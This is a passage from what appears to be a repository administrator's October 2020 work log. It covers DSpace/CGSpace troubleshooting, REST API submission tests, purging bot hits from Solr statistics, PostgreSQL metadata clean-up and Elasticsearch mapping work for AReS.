+<li>Importing items from the command line throws a <code>NullPointerException</code> from <code>com.atmire.dspace.cua.CUASolrLoggerServiceImpl</code> for every item, but the item still gets imported</li>
+<li>No results for author name in Listing and Reports, despite there being hits in Discovery search</li>
+</ul>
+</li>
+<li>To test the first one I imported a very simple CSV file with one item with minimal data
+<ul>
+<li>There is a new error now (but the item does get imported):</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ dspace metadata-import -f /tmp/2020-10-06-import-test.csv -e aorth@mjanja.ch
+Loading @mire database changes for module MQM
+Changes have been processed
+-----------------------------------------------------------
+New item:
+ + New owning collection (10568/3): ILRI articles in journals
+ + Add    (dc.contributor.author): Orth, Alan
+ + Add    (dc.date.issued): 2020-09-01
+ + Add    (dc.title): Testing CUA import NPE
+
+1 item(s) will be changed
+
+Do you want to make these changes? [y/n] y
+-----------------------------------------------------------
+New item: aff5e78d-87c9-438d-94f8-1050b649961c (10568/108548)
+ + New owning collection  (10568/3): ILRI articles in journals
+ + Added   (dc.contributor.author): Orth, Alan
+ + Added   (dc.date.issued): 2020-09-01
+ + Added   (dc.title): Testing CUA import NPE
+Tue Oct 06 22:06:14 CEST 2020 | Query:containerItem:aff5e78d-87c9-438d-94f8-1050b649961c
+Error while updating
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Expected mime type application/octet-stream but got text/html. &lt;!doctype html&gt;&lt;html lang=&#34;en&#34;&gt;&lt;head&gt;&lt;title&gt;HTTP Status 404 – Not Found&lt;/title&gt;&lt;style type=&#34;text/css&#34;&gt;body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;HTTP Status 404 – Not Found&lt;/h1&gt;&lt;hr class=&#34;line&#34; /&gt;&lt;p&gt;&lt;b&gt;Type&lt;/b&gt; Status Report&lt;/p&gt;&lt;p&gt;&lt;b&gt;Message&lt;/b&gt; The requested resource [/solr/update] is not available&lt;/p&gt;&lt;p&gt;&lt;b&gt;Description&lt;/b&gt; The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.&lt;/p&gt;&lt;hr class=&#34;line&#34; /&gt;&lt;h3&gt;Apache Tomcat/7.0.104&lt;/h3&gt;&lt;/body&gt;&lt;/html&gt;
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:512)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.commit(SolrServer.java:168)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl$5.visit(SourceFile:1131)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.visitEachStatisticShard(SourceFile:212)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1104)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1093)
+        at org.dspace.statistics.StatisticsLoggingConsumer.consume(SourceFile:104)
+        at org.dspace.event.BasicDispatcher.consume(BasicDispatcher.java:177)
+        at org.dspace.event.BasicDispatcher.dispatch(BasicDispatcher.java:123)
+        at org.dspace.core.Context.dispatchEvents(Context.java:455)
+        at org.dspace.core.Context.commit(Context.java:424)
+        at org.dspace.core.Context.complete(Context.java:380)
+        at org.dspace.app.bulkedit.MetadataImport.main(MetadataImport.java:1399)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</code></pre><ul>
+<li>Also, I tested Listings and Reports and there are still no hits for &ldquo;Orth, Alan&rdquo; as a contributor, despite there being dozens of items in the repository and the Solr query generated by Listings and Reports actually returning hits:</li>
+</ul>
+<pre tabindex="0"><code>2020-10-06 22:23:44,116 INFO org.apache.solr.core.SolrCore @ [search] webapp=/solr path=/select params={q=*:*&amp;fl=handle,search.resourcetype,search.resourceid,search.uniqueid&amp;start=0&amp;fq=NOT(withdrawn:true)&amp;fq=NOT(discoverable:false)&amp;fq=search.resourcetype:2&amp;fq=author_keyword:Orth,\+A.+OR+author_keyword:Orth,\+Alan&amp;fq=dateIssued.year:[2013+TO+2021]&amp;rows=500&amp;wt=javabin&amp;version=2} hits=18 status=0 QTime=10 
+</code></pre><ul>
+<li>Solr returns <code>hits=18</code> for the L&amp;R query, but there are no result shown in the L&amp;R UI</li>
+<li>I sent all this feedback to Atmire&hellip;</li>
+</ul>
+<h2 id="2020-10-07">2020-10-07</h2>
+<ul>
+<li>Udana from IWMI had asked about stats discrepencies from reports they had generated in previous months or years
+<ul>
+<li>I told him that we very often purge bots and the number of stats can change drastically</li>
+<li>Also, I told him that it is not possible to compare stats from previous exports and that the stats should be taking with a grain of salt</li>
+</ul>
+</li>
+<li>Testing POSTing items to the DSpace 6 REST API
+<ul>
+<li>We need to authenticate to get a JSESSIONID cookie first:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ http -f POST https://dspacetest.cgiar.org/rest/login email=aorth@fuuu.com &#39;password=fuuuu&#39;
+$ http https://dspacetest.cgiar.org/rest/status Cookie:JSESSIONID=EABAC9EFF942028AA52DFDA16DBCAFDE
+</code></pre><ul>
+<li>Then we post an item in JSON format to <code>/rest/collections/{uuid}/items</code>:</li>
+</ul>
+<pre tabindex="0"><code>$ http POST https://dspacetest.cgiar.org/rest/collections/f10ad667-2746-4705-8b16-4439abe61d22/items Cookie:JSESSIONID=EABAC9EFF942028AA52DFDA16DBCAFDE &lt; item-object.json
+</code></pre><ul>
+<li>Format of JSON is:</li>
+</ul>
+<pre tabindex="0"><code>{ &#34;metadata&#34;: [
+    {
+      &#34;key&#34;: &#34;dc.title&#34;,
+      &#34;value&#34;: &#34;Testing REST API post&#34;,
+      &#34;language&#34;: &#34;en_US&#34;
+    },
+    {
+      &#34;key&#34;: &#34;dc.contributor.author&#34;,
+      &#34;value&#34;: &#34;Orth, Alan&#34;,
+      &#34;language&#34;: &#34;en_US&#34;
+    },
+    {
+      &#34;key&#34;: &#34;dc.date.issued&#34;,
+      &#34;value&#34;: &#34;2020-09-01&#34;,
+      &#34;language&#34;: &#34;en_US&#34;
+    }
+  ],
+  &#34;archived&#34;:&#34;false&#34;,
+  &#34;withdrawn&#34;:&#34;false&#34;
+}
+</code></pre><ul>
+<li>What is unclear to me is the <code>archived</code> parameter, it seems to do nothing&hellip; perhaps it is only used for the <code>/items</code> endpoint when printing information about an item
+<ul>
+<li>If I submit to a collection that has a workflow, even as a super admin and with &ldquo;archived=false&rdquo; in the JSON, the item enters the workflow (&ldquo;Awaiting editor&rsquo;s attention&rdquo;)</li>
+<li>If I submit to a new collection without a workflow the item gets archived immediately</li>
+<li>I created <a href="https://gist.github.com/alanorth/40fc3092aefd78f978cca00e8abeeb7a">some notes</a> to share with Salem and Leroy for future reference when we start discussion POSTing items to the REST API</li>
+</ul>
+</li>
+<li>I created an account for Salem on DSpace Test and added it to the submitters group of an ICARDA collection with no other workflow steps so we can see what happens
+<ul>
+<li>We are curious to see if he gets a UUID when posting from MEL</li>
+</ul>
+</li>
+<li>I did some tests by adding his account to certain workflow steps and trying to POST the item</li>
+<li>Member of collection &ldquo;Submitters&rdquo; step:
+<ul>
+<li>HTTP Status 401 – Unauthorized</li>
+<li>The request has not been applied because it lacks valid authentication credentials for the target resource.</li>
+</ul>
+</li>
+<li>Member of collection &ldquo;Accept/Reject&rdquo; step:
+<ul>
+<li>Same error&hellip;</li>
+</ul>
+</li>
+<li>Member of collection &ldquo;Accept/Reject/Edit Metadata&rdquo; step:
+<ul>
+<li>Same error&hellip;</li>
+</ul>
+</li>
+<li>Member of collection Administrators with no other workflow steps&hellip;:
+<ul>
+<li>Posts straight to archive</li>
+</ul>
+</li>
+<li>Member of collection Administrators with empty &ldquo;Accept/Reject/Edit Metadata&rdquo; step:
+<ul>
+<li>Posts straight to archive</li>
+</ul>
+</li>
+<li>Member of collection Administrators with populated &ldquo;Accept/Reject/Edit Metadata&rdquo; step:
+<ul>
+<li>Does <em>not</em> post straight to archive, goes to workflow</li>
+</ul>
+</li>
+<li>Note that community administrators have no role in item submission other than being able to create/manage collection groups</li>
+</ul>
+<h2 id="2020-10-08">2020-10-08</h2>
+<ul>
+<li>I did some testing of the DSpace 5 REST API because Salem and I were curious
+<ul>
+<li>The authentication is a little different (uses a serialized JSON object instead of a form and the token is an HTTP header instead of a cookie):</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ http POST http://localhost:8080/rest/login email=aorth@fuuu.com &#39;password=ddddd&#39;
+$ http http://localhost:8080/rest/status rest-dspace-token:d846f138-75d3-47ba-9180-b88789a28099
+$ http POST http://localhost:8080/rest/collections/1549/items rest-dspace-token:d846f138-75d3-47ba-9180-b88789a28099 &lt; item-object.json
+</code></pre><ul>
+<li>The item submission works exactly the same as in DSpace 6:</li>
+</ul>
+<ol>
+<li>The submitting user must be a collection admin</li>
+<li>If the collection has a workflow the item will enter it and the API returns an item ID</li>
+<li>If the collection does not have a workflow then the item is committed to the archive and you get a Handle</li>
+</ol>
+<h2 id="2020-10-09">2020-10-09</h2>
+<ul>
+<li>Skype with Peter about AReS and CGSpace
+<ul>
+<li>We discussed removing Atmire Listings and Reports from DSpace 6 because we can probably make the same reports in AReS and this module is the one that is currently holding us back from the upgrade</li>
+<li>We discussed allowing partners to submit content via the REST API and perhaps making it an extra fee due to the burden it incurs with unfinished submissions, manual duplicate checking, developer support, etc</li>
+<li>He was excited about the possibility of using my statistics API for more things on AReS as well as item view pages</li>
+</ul>
+</li>
+<li>Also I fixed a bunch of the CRP mappings in the AReS value mapper and started a fresh re-indexing</li>
+</ul>
+<h2 id="2020-10-12">2020-10-12</h2>
+<ul>
+<li>Looking at CGSpace&rsquo;s Solr statistics for 2020-09 and I see:
+<ul>
+<li><code>RTB website BOT</code>: 212916</li>
+<li><code>Java/1.8.0_66</code>: 3122</li>
+<li><code>Mozilla/5.0 (compatible; um-LN/1.0; mailto: techinfo@ubermetrics-technologies.com; Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1</code>: 614</li>
+<li><code>omgili/0.5 +http://omgili.com</code>: 272</li>
+<li><code>Mozilla/5.0 (compatible; TrendsmapResolver/0.1)</code>: 199</li>
+<li><code>Vizzit</code>: 160</li>
+<li><code>Scoop.it</code>: 151</li>
+</ul>
+</li>
+<li>I&rsquo;m confused because a pattern for <code>bot</code> has existed in the default DSpace spider agents file forever&hellip;
+<ul>
+<li>I see 259,000 hits in CGSpace&rsquo;s 2020 Solr core when I search for this: <code>userAgent:/.*[Bb][Oo][Tt].*/</code>
+<ul>
+<li>This includes 228,000 for <code>RTB website BOT</code> and 18,000 for <code>ILRI Livestock Website Publications importer BOT</code></li>
+</ul>
+</li>
+<li>I made a few requests to DSpace Test with the RTB user agent to see if it gets logged or not:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&#34;RTB website BOT&#34;
+$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&#34;RTB website BOT&#34;
+$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&#34;RTB website BOT&#34;
+$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:&#34;RTB website BOT&#34;
+</code></pre><ul>
+<li>After a few minutes I saw these four hits in Solr&hellip; WTF
+<ul>
+<li>So is there some issue with DSpace&rsquo;s parsing of the spider agent files?</li>
+<li>I added <code>RTB website BOT</code> to the ilri pattern file, restarted Tomcat, and made four more requests to the bitstream</li>
+<li>These four requests were recorded in Solr too, WTF!</li>
+<li>It seems like the patterns aren&rsquo;t working at all&hellip;</li>
+<li>I decided to try something drastic and removed all pattern files, adding only one single pattern <code>bot</code> to make sure this is not because of a syntax or precedence issue</li>
+<li>Now even those four requests were recorded in Solr, WTF!</li>
+<li>I will try one last thing, to put a single entry with the exact pattern <code>RTB website BOT</code> in a single spider agents pattern file&hellip;</li>
+<li>Nope! Still records the hits&hellip; WTF</li>
+<li>As a last resort I tried to use the vanilla <a href="https://github.com/DSpace/DSpace/blob/dspace-6_x/dspace/config/spiders/agents/example">DSpace 6 <code>example</code> file</a></li>
+<li>And the hits still get recorded&hellip; WTF</li>
+<li>So now I&rsquo;m wondering if this is because of our custom Atmire shit?</li>
+<li>I will have to test on a vanilla DSpace instance I guess before I can complain to the dspace-tech mailing list</li>
+</ul>
+</li>
+<li>I re-factored the <code>check-spider-hits.sh</code> script to read patterns from a text file rather than sed&rsquo;s stdout, and to properly search for spaces in patterns that use <code>\s</code> because Lucene&rsquo;s search syntax doesn&rsquo;t support it (and spaces work just fine)
+<ul>
+<li>Reference: <a href="https://www.elastic.co/guide/en/elasticsearch/reference/current/regexp-syntax.html">https://www.elastic.co/guide/en/elasticsearch/reference/current/regexp-syntax.html</a></li>
+<li>Reference: <a href="https://lucene.apache.org/core/4_0_0/queryparser/org/apache/lucene/queryparser/classic/package-summary.html#Regexp_Searches">https://lucene.apache.org/core/4_0_0/queryparser/org/apache/lucene/queryparser/classic/package-summary.html#Regexp_Searches</a></li>
+</ul>
+</li>
+<li>I added <code>[Ss]pider</code> to the Tomcat Crawler Session Manager Valve regex because this can catch a few more generic bots and force them to use the same Tomcat JSESSIONID</li>
+<li>I added a few of the patterns from above to our local agents list and ran the <code>check-spider-hits.sh</code> on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./check-spider-hits.sh -f dspace/config/spiders/agents/ilri -s statistics -u http://localhost:8083/solr -p
+Purging 228916 hits from RTB website BOT in statistics
+Purging 18707 hits from ILRI Livestock Website Publications importer BOT in statistics
+Purging 2661 hits from ^Java\/[0-9]{1,2}.[0-9] in statistics
+Purging 199 hits from [Ss]pider in statistics
+Purging 2326 hits from ubermetrics in statistics
+Purging 888 hits from omgili\.com in statistics
+Purging 1888 hits from TrendsmapResolver in statistics
+Purging 3546 hits from Vizzit in statistics
+Purging 2127 hits from Scoop\.it in statistics
+
+Total number of bot hits purged: 261258
+$ ./check-spider-hits.sh -f dspace/config/spiders/agents/ilri -s statistics-2019 -u http://localhost:8083/solr -p
+Purging 2952 hits from TrendsmapResolver in statistics-2019
+Purging 4252 hits from Vizzit in statistics-2019
+Purging 2976 hits from Scoop\.it in statistics-2019
+
+Total number of bot hits purged: 10180
+$ ./check-spider-hits.sh -f dspace/config/spiders/agents/ilri -s statistics-2018 -u http://localhost:8083/solr -p
+Purging 1702 hits from TrendsmapResolver in statistics-2018
+Purging 1062 hits from Vizzit in statistics-2018
+Purging 920 hits from Scoop\.it in statistics-2018
+
+Total number of bot hits purged: 3684
+</code></pre><h2 id="2020-10-13">2020-10-13</h2>
+<ul>
+<li>Skype with Peter about AReS again
+<ul>
+<li>We decided to use Title Case for our countries on CGSpace to minimize the need for mapping on AReS</li>
+<li>We did some work to add a dozen more mappings for strange and incorrect CRPs on AReS</li>
+</ul>
+</li>
+<li>I can update the country metadata in PostgreSQL like this:</li>
+</ul>
+<pre tabindex="0"><code>dspace=&gt; BEGIN;
+dspace=&gt; UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE resource_type_id=2 AND metadata_field_id=228;
+UPDATE 51756
+dspace=&gt; COMMIT;
+</code></pre><ul>
+<li>I will need to pay special attention to Côte d&rsquo;Ivoire, Bosnia and Herzegovina, and a few others though&hellip; maybe better do search and replace using <code>fix-metadata-values.csv</code>
+<ul>
+<li>Export a list of distinct values from the database:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=&gt; \COPY (SELECT DISTINCT(text_value) as &#34;cg.coverage.country&#34; FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228) TO /tmp/2020-10-13-countries.csv WITH CSV HEADER;
+COPY 195
+</code></pre><ul>
+<li>Then use OpenRefine and make a new column for corrections, then use this GREL to convert to title case: <code>value.toTitlecase()</code>
+<ul>
+<li>I still had to double check everything to catch some corner cases (Andorra, Timor-leste, etc)</li>
+</ul>
+</li>
+<li>For the input forms I found out how to do a complicated search and replace in vim:</li>
+</ul>
+<pre tabindex="0"><code>:&#39;&lt;,&#39;&gt;s/\&lt;\(pair\|displayed\|stored\|value\|AND\)\@!\(\w\)\(\w*\|\)\&gt;/\u\2\L\3/g
+</code></pre><ul>
+<li>It uses a <a href="https://jbodah.github.io/blog/2016/11/01/positivenegative-lookaheadlookbehind-vim/">negative lookahead</a> (aka &ldquo;lookaround&rdquo; in PCRE?) to match words that are <em>not</em> &ldquo;pair&rdquo;, &ldquo;displayed&rdquo;, etc because we don&rsquo;t want to edit the XML tags themselves&hellip;
+<ul>
+<li>I had to fix a few manually after doing this, as above with PostgreSQL</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-10-14">2020-10-14</h2>
+<ul>
+<li>I discussed the title casing of countries with Abenet and she suggested we also apply title casing to regions
+<ul>
+<li>I exported the list of regions from the database:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=&gt; \COPY (SELECT DISTINCT(text_value) as &#34;cg.coverage.region&#34; FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=227) TO /tmp/2020-10-14-regions.csv WITH CSV HEADER;
+COPY 34
+</code></pre><ul>
+<li>I did the same as the countries in OpenRefine for the database values and in vim for the input forms</li>
+<li>After testing the replacements locally I ran them on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-10-13-CGSpace-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -t &#39;correct&#39; -m 228
+$ ./fix-metadata-values.py -i /tmp/2020-10-14-CGSpace-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -t &#39;correct&#39; -m 227
+</code></pre><ul>
+<li>Then I started a full re-indexing:</li>
+</ul>
+<pre tabindex="0"><code>$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    88m21.678s
+user    7m59.182s
+sys     2m22.713s
+</code></pre><ul>
+<li>I added a dozen or so more mappings to fix some country outliers on AReS
+<ul>
+<li>I will start a fresh harvest there once the Discovery update is done on CGSpace</li>
+</ul>
+</li>
+<li>I also adjusted my <code>fix-metadata-values.py</code> and <code>delete-metadata-values.py</code> scripts to work on DSpace 6 where there is no more <code>resource_type_id</code> field
+<ul>
+<li>I will need to do it on a few more scripts as well, but I&rsquo;ll do that after we migrate to DSpace 6 because those scripts are less important</li>
+</ul>
+</li>
+<li>I found a new setting in DSpace 6&rsquo;s <code>usage-statistics.cfg</code> about case insensitive matching of bots that defaults to false, so I enabled it in our DSpace 6 branch
+<ul>
+<li>I am curious to see if that resolves the strange issues I noticed yesterday about bot matching of patterns in the spider agents file completely not working</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-10-15">2020-10-15</h2>
+<ul>
+<li>Re-deploy latest code on both CGSpace and DSpace Test to get the input forms changes
+<ul>
+<li>Run system updates and reboot each server (linode18 and linode26)</li>
+<li>I had to restart Tomcat seven times on CGSpace before all Solr stats cores came up OK</li>
+</ul>
+</li>
+<li>Skype with Peter and Abenet about AReS and CGSpace
+<ul>
+<li>We agreed to lower case the AGROVOC subjects on CGSpace to make it harmonized with MELSpace and WorldFish</li>
+<li>We agreed to separate the AGROVOC from the other center- and CRP-specific subjects so that the search and tag clouds are cleaner and more useful</li>
+<li>We added a filter for journal title</li>
+</ul>
+</li>
+<li>I enabled anonymous access to the &ldquo;Export search metadata&rdquo; option on DSpace Test
+<ul>
+<li>If I search for author containing &ldquo;Orth, Alan&rdquo; or &ldquo;Orth Alan&rdquo; the export search metadata returns HTTP 400</li>
+<li>If I search for author containing &ldquo;Orth&rdquo; it exports a CSV properly&hellip;</li>
+</ul>
+</li>
+<li>I created issues on the OpenRXV repository:
+<ul>
+<li><a href="https://github.com/ilri/OpenRXV/issues/42">Can&rsquo;t download templates that have spaces in their file name</a></li>
+<li><a href="https://github.com/ilri/OpenRXV/issues/43">Can&rsquo;t search for text values with a space in &ldquo;Mapping Values&rdquo; interface</a></li>
+</ul>
+</li>
+<li>Atmire responded about the Listings and Reports and Content and Usage Statistics issues with DSpace 6 that I reported last week
+<ul>
+<li>They said that the CUA issue was a mistake and should be fixed in a minor version bump</li>
+<li>They asked me to confirm if the L&amp;R version bump from last week did not solve the issue there (which I had tested locally, but not on DSpace Test)</li>
+<li>I will test them both again on DSpace Test and report back</li>
+</ul>
+</li>
+<li>I posted a message on Yammer to inform all our users about the changes to countries, regions, and AGROVOC subjects</li>
+<li>I modified all AGROVOC subjects to be lower case in PostgreSQL and then exported a list of the top 1500 to update the controlled vocabulary in our submission form:</li>
+</ul>
+<pre tabindex="0"><code>dspace=&gt; BEGIN;
+dspace=&gt; UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57;
+UPDATE 335063
+dspace=&gt; COMMIT;
+dspace=&gt; \COPY (SELECT DISTINCT text_value as &#34;dc.subject&#34;, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=57 GROUP BY &#34;dc.subject&#34; ORDER BY count DESC LIMIT 1500) TO /tmp/2020-10-15-top-1500-agrovoc-subject.csv WITH CSV HEADER;
+COPY 1500
+</code></pre><ul>
+<li>Use my <code>agrovoc-lookup.py</code> script to validate subject terms against the AGROVOC REST API, extract matches with <code>csvgrep</code>, and then update and format the controlled vocabulary:</li>
+</ul>
+<pre tabindex="0"><code>$ csvcut -c 1 /tmp/2020-10-15-top-1500-agrovoc-subject.csv | tail -n 1500 &gt; /tmp/subjects.txt
+$ ./agrovoc-lookup.py -i /tmp/subjects.txt -o /tmp/subjects.csv -d
+$ csvgrep -c 4 -m 0 -i /tmp/subjects.csv | csvcut -c 1 | sed &#39;1d&#39; &gt; dspace/config/controlled-vocabularies/dc-subject.xml
+# apply formatting in XML file
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.xml
+</code></pre><ul>
+<li>Then I started a full re-indexing on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    88m21.678s
+user    7m59.182s
+sys     2m22.713s
+</code></pre><h2 id="2020-10-18">2020-10-18</h2>
+<ul>
+<li>Macaroni Bros wrote to me to ask why some of their CCAFS harvesting is failing
+<ul>
+<li>They are scraping HTML from /browse responses like this:</li>
+</ul>
+</li>
+</ul>
+<p><a href="https://cgspace.cgiar.org/browse?type=crpsubject&amp;value=Climate+Change%2C+Agriculture+and+Food+Security&amp;XML&amp;rpp=5000">https://cgspace.cgiar.org/browse?type=crpsubject&amp;value=Climate+Change%2C+Agriculture+and+Food+Security&amp;XML&amp;rpp=5000</a></p>
+<ul>
+<li>They are using the user agent &ldquo;CCAFS Website Publications importer BOT&rdquo; so they are getting rate limited by nginx</li>
+<li>Ideally they would use the REST <code>find-by-metadata-field</code> endpoint, but it is <em>really</em> slow for large result sets (like twenty minutes!):</li>
+</ul>
+<pre tabindex="0"><code>$ curl -f -H &#34;CCAFS Website Publications importer BOT&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field?limit=100&#34; -d &#39;{&#34;key&#34;:&#34;cg.contributor.crp&#34;, &#34;value&#34;:&#34;Climate Change, Agriculture and Food Security&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
+</code></pre><ul>
+<li>For now I will whitelist their user agent so that they can continue scraping /browse</li>
+<li>I figured out that the mappings for AReS are stored in Elasticsearch
+<ul>
+<li>There is a Kibana interface running on port 5601 that can help explore the values in the index</li>
+<li>I can interact with Elasticsearch by sending requests, for example to delete an item by its <code>_id</code>:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ curl -XPOST &#34;localhost:9200/openrxv-values/_delete_by_query&#34; -H &#39;Content-Type: application/json&#39; -d&#39;
+{
+  &#34;query&#34;: {
+    &#34;match&#34;: {
+      &#34;_id&#34;: &#34;64j_THMBiwiQ-PKfCSlI&#34;
+    }
+  }
+}
+</code></pre><ul>
+<li>I added a new find/replace:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -XPOST &#34;localhost:9200/openrxv-values/_doc?pretty&#34; -H &#39;Content-Type: application/json&#39; -d&#39;
+{
+  &#34;find&#34;: &#34;ALAN1&#34;,
+  &#34;replace&#34;: &#34;ALAN2&#34;,
+}
+&#39;
+</code></pre><ul>
+<li>I see it in Kibana, and I can search it in Elasticsearch, but I don&rsquo;t see it in OpenRXV&rsquo;s mapping values dashboard</li>
+<li>Now I deleted everything in the <code>openrxv-values</code> index:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -XDELETE http://localhost:9200/openrxv-values
+</code></pre><ul>
+<li>Then I tried posting it again:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -XPOST &#34;localhost:9200/openrxv-values/_doc?pretty&#34; -H &#39;Content-Type: application/json&#39; -d&#39;
+{
+  &#34;find&#34;: &#34;ALAN1&#34;,
+  &#34;replace&#34;: &#34;ALAN2&#34;,
+}
+&#39;
+</code></pre><ul>
+<li>But I still don&rsquo;t see it in AReS</li>
+<li>Interesting! I added a find/replace manually in AReS and now I see the one I POSTed&hellip;</li>
+<li>I fixed a few bugs in the Simple and Extended PDF reports on AReS
+<ul>
+<li>Add missing ISI Journal and Type to Simple PDF report</li>
+<li>Fix DOIs in Simple PDF report</li>
+<li>Add missing &ldquo;<a href="https://hdl.handle.net">https://hdl.handle.net</a>&rdquo; to Handles in Extented PDF report</li>
+</ul>
+</li>
+<li>Testing Atmire CUA and L&amp;R based on their feedback from a few days ago
+<ul>
+<li>I no longer get the NullPointerException from CUA when importing metadata on the command line (!)</li>
+<li>Listings and Reports now shows results for simple queries that I tested (!), though it seems that there are some new JavaScript libraries I need to allow in nginx</li>
+</ul>
+</li>
+<li>I sent a mail to the dspace-tech mailing list asking about the error with DSpace 6&rsquo;s &ldquo;Export Search Metadata&rdquo; function
+<ul>
+<li>If I search for an author like &ldquo;Orth, Alan&rdquo; it gives an HTTP 400, but if I search for &ldquo;Orth&rdquo; alone it exports a CSV</li>
+<li>I replicated the same issue on demo.dspace.org</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-10-19">2020-10-19</h2>
+<ul>
+<li>Last night I learned how to POST mappings to Elasticsearch for AReS:</li>
+</ul>
+<pre tabindex="0"><code>$ curl -XDELETE http://localhost:9200/openrxv-values
+$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H &#34;Content-Type: application/json&#34; --data-binary @./mapping.json
+</code></pre><ul>
+<li>The JSON file looks like this, with one instruction on each line:</li>
+</ul>
+<pre tabindex="0"><code>{&#34;index&#34;:{}}
+{ &#34;find&#34;: &#34;CRP on Dryland Systems - DS&#34;, &#34;replace&#34;: &#34;Dryland Systems&#34; }
+{&#34;index&#34;:{}}
+{ &#34;find&#34;: &#34;FISH&#34;, &#34;replace&#34;: &#34;Fish&#34; }
+</code></pre><ul>
+<li>Adjust the report templates on AReS based on some of Peter&rsquo;s feedback</li>
+<li>I wrote a quick Python script to filter and convert the old AReS mappings to <a href="https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-bulk.html">Elasticsearch&rsquo;s Bulk API</a> format:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span>
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> json
+</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> re
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span>f <span style="color:#f92672">=</span> open(<span style="color:#e6db74">&#39;/tmp/mapping.json&#39;</span>, <span style="color:#e6db74">&#39;r&#39;</span>)
+</span></span><span style="display:flex;"><span>data <span style="color:#f92672">=</span> json<span style="color:#f92672">.</span>load(f)
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span><span style="color:#75715e"># Iterate over old mapping file, which is in format &#34;find&#34;: &#34;replace&#34;, ie:</span>
+</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
+</span></span><span style="display:flex;"><span><span style="color:#75715e">#   &#34;alan&#34;: &#34;ALAN&#34;</span>
+</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
+</span></span><span style="display:flex;"><span><span style="color:#75715e"># And convert to proper dictionaries for import into Elasticsearch&#39;s Bulk API:</span>
+</span></span><span style="display:flex;"><span><span style="color:#75715e">#</span>
